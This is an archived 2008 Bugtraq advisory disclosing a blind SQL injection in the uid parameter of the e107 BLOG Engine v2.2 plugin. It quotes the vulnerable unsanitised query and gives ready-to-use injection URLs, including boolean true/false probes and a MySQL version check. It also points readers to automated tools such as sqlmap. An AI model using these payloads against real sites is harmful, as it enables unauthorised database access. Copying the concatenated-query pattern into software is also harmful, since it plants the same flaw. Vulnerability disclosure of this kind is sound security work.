[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection Vulnerability
- From: hadihadi_zedehal_2006@xxxxxxxxx
- Date: 23 May 2008 00:41:14 -0000
##################################################################################################
#
#
# ::e107 Plugin BLOG Engine v2.2 (macgurublog.php/uid) Blind SQL Injection
Vulnerability:: #
#
#
##################################################################################################
Virangar Security Team
www.virangar.net
--------
Discoverd By :virangar security team(hadihadi)
special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
& all virangar members & all hackerz
greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal)
-------vuln codes in:-----------
macgurublog.php:
line 18:$buid = $_GET['uid'];
..
..
line 31:$sql -> db_Select("user", "user_name", "user_id=".$buid);
---
exploit:
[-]note=becuse e107 using diffrent prefix/table names it's impossible to
writting exploit for it :(
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 2>1/*
#the page fully loaded
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and 1>3/*
#page loaded whit any data and some error that say "The user has hidden their
blog."
cheking the mysql version:
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and
substring(@@version,1,1)=5
or
http://site.com/e107_plugins/macgurublog_menu/macgurublog.php?uid=1 and
substring(@@version,1,1)=4
# you can exploting the bug white blind sql automatic toolz such as sqlmap or
...
---
young iranian h4ck3rz